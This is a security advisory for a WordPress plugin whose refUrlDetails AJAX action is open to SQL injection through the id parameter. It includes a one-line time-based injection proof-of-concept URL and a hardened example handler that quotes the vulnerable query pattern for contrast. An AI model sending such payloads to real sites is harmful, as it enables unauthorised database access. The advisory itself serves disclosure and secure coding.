The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the refUrlDetails AJAX action, which is available to any authenticated user, leading to SQL injection.
https://example.com/wp-admin/admin-ajax.php?action=refUrlDetails&id=sleep(1)%20--%20g
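A hardened handler for an AJAX action of this shape, as an added example; it is not the plugin's own code or its actual fix. The function name, table name, nonce action and required capability are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handler, not taken from the affected plugin.
// Assumed names: example_ref_url_details(), the 'example_ref_urls' table,
// the nonce action string and the 'manage_options' capability.

add_action( 'wp_ajax_refUrlDetails', 'example_ref_url_details' );

function example_ref_url_details() {
    global $wpdb;

    // wp_ajax_* hooks fire for every logged-in user, so authorise explicitly.
    check_ajax_referer( 'example_ref_url_details' ); // stops the request if the nonce is invalid
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Pattern the advisory describes (shown for contrast only):
    //   $wpdb->get_row( "SELECT * FROM $table WHERE id = " . $_REQUEST['id'] );
    // Here the request value is concatenated into the statement text, so a
    // value like the sleep(1) string in the URL above is parsed as SQL.

    // Validate: accept only a string of decimal digits, reject everything else.
    $raw = isset( $_REQUEST['id'] ) ? wp_unslash( $_REQUEST['id'] ) : '';
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) ) {
        wp_send_json_error( 'invalid id', 400 );
    }
    $id = absint( $raw );

    // Bind the value through a %d placeholder so it is treated as data.
    $table = $wpdb->prefix . 'example_ref_urls'; // placeholder table name
    $row   = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id ),
        ARRAY_A
    );

    if ( null === $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    wp_send_json_success( $row );
}
```

With this handler the request shown above is rejected with a 400 response before any query is built, because the id value is not a string of digits.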